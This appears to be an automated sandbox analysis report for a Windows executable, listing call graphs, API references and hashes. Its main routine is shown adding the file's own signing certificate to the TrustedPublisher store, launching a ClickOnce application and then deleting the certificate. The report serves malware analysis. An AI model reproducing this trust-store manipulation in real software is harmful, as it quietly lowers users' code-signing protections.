5922 9c15b3 5923->5922 6042 9c12fb 6047 9c1aac SetUnhandledExceptionFilter 6042->6047 6044 9c1300 6048 9c38f9 6044->6048 6046 9c130b 6047->6044 6049 9c391f 6048->6049 6050 9c3905 6048->6050 6049->6046 6050->6049 6051 9c47f9 __dosmaperr 15 API calls 6050->6051 6052 9c390f 6051->6052 6053 9c473d _abort 21 API calls 6052->6053 6054 9c391a 6053->6054 6054->6046 6055 9c1ff4 6058 9c2042 6055->6058 6059 9c1fff 6058->6059 6060 9c204b 6058->6060 6060->6059 6061 9c23c3 43 API calls 6060->6061 6062 9c2086 6061->6062 6063 9c23c3 43 API calls 6062->6063 6064 9c2091 6063->6064 6065 9c3e89 33 API calls 6064->6065 6066 9c2099 6065->6066 5924 9c3eb5 5925 9c3eb8 5924->5925 5926 9c3f24 _abort 33 API calls 5925->5926 5927 9c3ec4 
5926->5927 6796 9c7570 6797 9c75a9 6796->6797 6798 9c47f9 __dosmaperr 15 API calls 6797->6798 6802 9c75d5 _ValidateLocalCookies 6797->6802 6799 9c75b2 6798->6799 6800 9c473d _abort 21 API calls 6799->6800 6801 9c75bd _ValidateLocalCookies 6800->6801 6067 9c8df1 6068 9c8e15 6067->6068 6069 9c8e2e 6068->6069 6071 9c9beb __startOneArgErrorHandling 6068->6071 6072 9c8e78 6069->6072 6075 9c99d3 6069->6075 6074 9c9c2d __startOneArgErrorHandling 6071->6074 6083 9ca1c4 6071->6083 6076 9c99f0 DecodePointer 6075->6076 6077 9c9a00 6075->6077 6076->6077 6078 9c9a8d 6077->6078 6079 9c9a82 _ValidateLocalCookies 6077->6079 6081 9c9a37 6077->6081 6078->6079 6080 9c47f9 __dosmaperr 15 API calls 6078->6080 6079->6072 6080->6079 6081->6079 6082 9c47f9 __dosmaperr 15 API calls 6081->6082 6082->6079 6084 9ca1fd __startOneArgErrorHandling 6083->6084 6085 9ca495 __raise_exc RaiseException 6084->6085 6086 9ca224 __startOneArgErrorHandling 6084->6086 6085->6086 6087 9ca267 6086->6087 6088 9ca242 6086->6088 6089 9ca786 __startOneArgErrorHandling 15 API calls 6087->6089 6092 9ca7b5 6088->6092 6091 9ca262 __startOneArgErrorHandling _ValidateLocalCookies 6089->6091 6091->6074 6093 9ca7c4 6092->6093 6094 9ca838 __startOneArgErrorHandling 6093->6094 6096 9ca7e3 __startOneArgErrorHandling 6093->6096 6095 9ca786 __startOneArgErrorHandling 15 API calls 6094->6095 6098 9ca831 6095->6098 6097 9ca786 __startOneArgErrorHandling 15 API calls 6096->6097 6096->6098 6097->6098 6098->6091 6552 9c452d 6560 9c5858 6552->6560 6554 9c4537 6555 9c44a8 __dosmaperr 15 API calls 6554->6555 6559 9c4541 6554->6559 6556 9c4549 6555->6556 6557 9c4556 6556->6557 6565 9c4559 6556->6565 6561 9c5741 _abort 5 API calls 6560->6561 6562 9c587f 6561->6562 6563 9c5897 TlsAlloc 6562->6563 6564 9c5888 _ValidateLocalCookies 6562->6564 6563->6564 6564->6554 6566 9c4569 6565->6566 6567 9c4563 6565->6567 6566->6559 6569 9c58ae 6567->6569 6570 9c5741 _abort 5 API calls 6569->6570 6571 9c58d5 6570->6571 6572 9c58ed TlsFree 6571->6572 
6573 9c58e1 _ValidateLocalCookies 6571->6573 6572->6573 6573->6566 6574 9c142e 6577 9c2cf0 6574->6577 6576 9c143f 6578 9c44a8 __dosmaperr 15 API calls 6577->6578 6579 9c2d07 _ValidateLocalCookies 6578->6579 6579->6576 6099 9c9beb 6100 9c9c04 __startOneArgErrorHandling 6099->6100 6101 9ca1c4 16 API calls 6100->6101 6102 9c9c2d __startOneArgErrorHandling 6100->6102 6101->6102 6103 9c33e5 6104 9c33fd 6103->6104 6105 9c33f7 6103->6105 6107 9c3376 6105->6107 6108 9c33a0 6107->6108 6109 9c3383 6107->6109 6108->6104 6110 9c339a 6109->6110 6111 9c4869 _free 15 API calls 6109->6111 6112 9c4869 _free 15 API calls 6110->6112 6111->6109 6112->6108 5928 9c5ba6 5929 9c5bd7 5928->5929 5930 9c5bb1 5928->5930 5930->5929 5931 9c5bc1 FreeLibrary 5930->5931 5931->5930 6580 9c6026 6583 9c602b 6580->6583 6582 9c604e 6583->6582 6584 9c5c56 6583->6584 6585 9c5c85 6584->6585 6586 9c5c63 6584->6586 6585->6583 6587 9c5c7f 6586->6587 6588 9c5c71 DeleteCriticalSection 6586->6588 6589 9c4869 _free 15 API calls 6587->6589 6588->6587 6588->6588 6589->6585 6803 9c9160 6806 9c917e 6803->6806 6805 9c9176 6807 9c9183 6806->6807 6808 9c99d3 16 API calls 6807->6808 6809 9c9218 6807->6809 6810 9c93af 6808->6810 6809->6805 6810->6805 5932 9c56a1 5933 9c56ac 5932->5933 5935 9c56d5 5933->5935 5936 9c56d1 5933->5936 5938 9c59b3 5933->5938 5943 9c56f9 5935->5943 5939 9c5741 _abort 5 API calls 5938->5939 5940 9c59da 5939->5940 5941 9c59f8 InitializeCriticalSectionAndSpinCount 5940->5941 5942 9c59e3 _ValidateLocalCookies 5940->5942 5941->5942 5942->5933 5944 9c5725 5943->5944 5945 9c5706 5943->5945 5944->5936 5946 9c5710 DeleteCriticalSection 5945->5946 5946->5944 5946->5946 6113 9c8ce1 6114 9c8d01 6113->6114 6117 9c8d38 6114->6117 6116 9c8d2b 6118 9c8d3f 6117->6118 6119 9c8da0 6118->6119 6123 9c8d5f 6118->6123 6120 9c988e 6119->6120 6121 9c9997 16 API calls 6119->6121 6120->6116 6122 9c8dee 6121->6122 6122->6116 6123->6120 6124 9c9997 16 API calls 6123->6124 6125 9c98be 6124->6125 6125->6116

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 009C1016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 009C1025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 009C1032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 009C1057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 009C1063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 009C1082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 009C10B2
                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,?), ref: 009C10C5
                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00002000), ref: 009C10F4
                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 009C110A
                                                                                                                                                                                                  • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 009C111A
                                                                                                                                                                                                  • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 009C112D
                                                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 009C1134
                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 009C113E
                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 009C115D
                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 009C116E
                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 009C1182
                                                                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 009C1198
                                                                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 009C11A9
                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(dfshim), ref: 009C11BA
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 009C11C6
                                                                                                                                                                                                  • Sleep.KERNELBASE(00009C40), ref: 009C11E8
                                                                                                                                                                                                  • CertDeleteCertificateFromStore.CRYPT32(?), ref: 009C120B
                                                                                                                                                                                                  • CertCloseStore.CRYPT32(?,00000000), ref: 009C121A
                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009C1223
                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009C1228
                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009C122D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                  • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                  • API String ID: 335784236-860318880
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009C192B
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 009C19F7
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009C1A10
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 009C1A1A
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 009C466B
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009C4675
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 009C4682
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,009C364D,?,009D02E0,0000000C,009C37A4,?,00000002,00000000,?,009C3F66,00000003,009C209F,009C1AFC), ref: 009C3698
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,009C364D,?,009D02E0,0000000C,009C37A4,?,00000002,00000000,?,009C3F66,00000003,009C209F,009C1AFC), ref: 009C369F
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 009C36B1
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009CA490,?,?,00000008,?,?,009CA130,00000000), ref: 009CA6C2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                  • Opcode ID: 11e29c6da91660b962b68f2e109599ea387523cedfb88df73237309df66a20ad
                                                                                                                                                                                                  • Instruction ID: 228bb4dc1867652a4a3be518af9c52977823282ab434509d5c126c01c2253f9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11e29c6da91660b962b68f2e109599ea387523cedfb88df73237309df66a20ad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CB12C31A106089FD715CF28C58AF657BE0FF45368F29865CE99ACF2A2C335D991CB42
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009C1BEA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                  • Opcode ID: 1d2a4c487f78486ad694c8b215e215a821c9f277873b458d410aafb2259a2253
                                                                                                                                                                                                  • Instruction ID: f1450a4355952f9e17715e712e07737e47bbebf347d530e3d109514e55926768
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d2a4c487f78486ad694c8b215e215a821c9f277873b458d410aafb2259a2253
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33519072EA52059BEB18CF94D881BAEB7F8FB49340F14802AD441EB295D3789A80CF55
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,009C1300), ref: 009C1AB1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                  • Opcode ID: 93223fc855632ddbb5199c86a7c998f7a601089c41dc8cb95aab1d5d0079ce48
                                                                                                                                                                                                  • Instruction ID: 921c8fe3b137ccfd6612b8c10c99297dc7d241fadced659e2bcdaf7469c946b4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93223fc855632ddbb5199c86a7c998f7a601089c41dc8cb95aab1d5d0079ce48
                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                  • Opcode ID: 1913c910246014684bd660451abc25ef7f2ccc2f40ff10544a5b78ab562b50e6
                                                                                                                                                                                                  • Instruction ID: a5829250fd13cea7855cf808a81e23ce2c0bbe3c1dbe724068cf3ab691512973
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1913c910246014684bd660451abc25ef7f2ccc2f40ff10544a5b78ab562b50e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53A0243071D101DF4300CF315F4730C37DC55005C0F0540155005C1030D73040C07F01

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 81 9c6507-9c651b 82 9c651d-9c6522 81->82 83 9c6589-9c6591 81->83 82->83 84 9c6524-9c6529 82->84 85 9c65d8-9c65f0 call 9c667a 83->85 86 9c6593-9c6596 83->86 84->83 87 9c652b-9c652e 84->87 95 9c65f3-9c65fa 85->95 86->85 89 9c6598-9c65d5 call 9c4869 * 4 86->89 87->83 90 9c6530-9c6538 87->90 89->85 93 9c653a-9c653d 90->93 94 9c6552-9c655a 90->94 93->94 97 9c653f-9c6551 call 9c4869 call 9c6078 93->97 100 9c655c-9c655f 94->100 101 9c6574-9c6588 call 9c4869 * 2 94->101 98 9c65fc-9c6600 95->98 99 9c6619-9c661d 95->99 97->94 105 9c6616 98->105 106 9c6602-9c6605 98->106 109 9c661f-9c6624 99->109 110 9c6635-9c6641 99->110 100->101 107 9c6561-9c6573 call 9c4869 call 9c6176 100->107 101->83 105->99 106->105 114 9c6607-9c6615 call 9c4869 * 2 106->114 107->101 117 9c6626-9c6629 109->117 118 9c6632 109->118 110->95 112 9c6643-9c6650 call 9c4869 110->112 114->105 117->118 119 9c662b-9c6631 call 9c4869 117->119 118->110 119->118
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 009C654B
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6095
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60A7
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60B9
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60CB
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60DD
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C60EF
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6101
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6113
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6125
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6137
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C6149
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C615B
                                                                                                                                                                                                    • Part of subcall function 009C6078: _free.LIBCMT ref: 009C616D
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6540
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6562
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6577
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6582
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C65A4
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C65B7
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C65C5
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C65D0
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6608
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C660F
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C662C
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C6644
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                  • Opcode ID: 89e38b01a793f9dc24dd6644f17d5b7ab912080e9b80965d6a6687587c05bd8a
                                                                                                                                                                                                  • Instruction ID: fe0d3e3c579bb7b5043d93f348fd169dc3b7c318600a3c2221efa963309a3292
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89e38b01a793f9dc24dd6644f17d5b7ab912080e9b80965d6a6687587c05bd8a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55314B71E047449FEB60AA7AE915F9A73ECAF80310F24442EF049DB191DE30ED40CB52

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 138 9c4330-9c4341 139 9c434d-9c43d8 call 9c4869 * 9 call 9c41f6 call 9c4246 138->139 140 9c4343-9c434c call 9c4869 138->140 140->139
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4344
                                                                                                                                                                                                    • Part of subcall function 009C4869: HeapFree.KERNEL32(00000000,00000000,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?), ref: 009C487F
                                                                                                                                                                                                    • Part of subcall function 009C4869: GetLastError.KERNEL32(?,?,009C620D,?,00000000,?,00000000,?,009C6234,?,00000007,?,?,009C669F,?,?), ref: 009C4891
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4350
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C435B
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4366
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4371
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C437C
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4387
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C4392
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C439D
                                                                                                                                                                                                  • _free.LIBCMT ref: 009C43AB
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 9c469afb2bc09c951f734525f270558b09a31713b0c19cd3d592b1ca9ae6710b
                                                                                                                                                                                                  • Instruction ID: 406a8de5e706e43e48535b953953b9aec9230ce64118ba9f899624e2458ff909
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c469afb2bc09c951f734525f270558b09a31713b0c19cd3d592b1ca9ae6710b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E11B976B00148FFCB41EF96D852ED93BA5EF84750F0140AAB9084F162DA31DE509B82

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  control_flow_graph 165 9c7ab4-9c7acd 166 9c7acf-9c7adf call 9c82cc 165->166 167 9c7ae3-9c7ae8 165->167 166->167 177 9c7ae1 166->177 169 9c7aea-9c7af2 167->169 170 9c7af5-9c7b19 MultiByteToWideChar 167->170 169->170 171 9c7cac-9c7cbf call 9c123a 170->171 172 9c7b1f-9c7b2b 170->172 174 9c7b2d-9c7b3e 172->174 175 9c7b7f 172->175 178 9c7b5d-9c7b63 174->178 179 9c7b40-9c7b4f call 9cac20 174->179 181 9c7b81-9c7b83 175->181 177->167 183 9c7b64 call 9c62ff 178->183 185 9c7ca1 179->185 191 9c7b55-9c7b5b 179->191 184 9c7b89-9c7b9c MultiByteToWideChar 181->184 181->185 187 9c7b69-9c7b6e 183->187 184->185 188 9c7ba2-9c7bbd call 9c5a15 184->188 189 9c7ca3-9c7caa call 9c646a 185->189 187->185 192 9c7b74 187->192 188->185 197 9c7bc3-9c7bca 188->197 189->171 196 9c7b7a-9c7b7d 191->196 192->196 196->181 198 9c7bcc-9c7bd1 197->198 199 9c7c04-9c7c10 197->199 198->189 200 9c7bd7-9c7bd9 198->200 201 9c7c5c 199->201 202 9c7c12-9c7c23 199->202 200->185 203 9c7bdf-9c7bf9 call 9c5a15 200->203 204 9c7c5e-9c7c60 201->204 205 9c7c3e-9c7c44 202->205 206 9c7c25-9c7c34 call 9cac20 202->206 203->189 218 9c7bff 203->218 208 9c7c9a-9c7ca0 call 9c646a 204->208 209 9c7c62-9c7c7b call 9c5a15 204->209 211 9c7c45 call 9c62ff 205->211 206->208 221 9c7c36-9c7c3c 206->221 208->185 209->208 223 9c7c7d-9c7c84 209->223 212 9c7c4a-9c7c4f 211->212 212->208 217 9c7c51 212->217 222 9c7c57-9c7c5a 217->222 218->185 221->222 222->204 224 9c7c86-9c7c87 223->224 225 9c7cc0-9c7cc6 223->225 226 9c7c88-9c7c98 WideCharToMultiByte 224->226 225->226 226->208 227 9c7cc8-9c7ccf call 9c646a 226->227 227->189
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,009C54C8,00000000,?,?,?,009C7D05,?,?,00000100), ref: 009C7B0E
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009C7B46
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,009C7D05,?,?,00000100,5EFC4D8B,?,?), ref: 009C7B94
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009C7C2B
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009C7C8E
                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C7C9B
                                                                                                                                                                                                    • Part of subcall function 009C62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009C7E5B,?,00000000,?,009C686F,?,00000004,00000000,?,?,?,009C3BCD), ref: 009C6331
                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C7CA4
                                                                                                                                                                                                  • __freea.LIBCMT ref: 009C7CC9
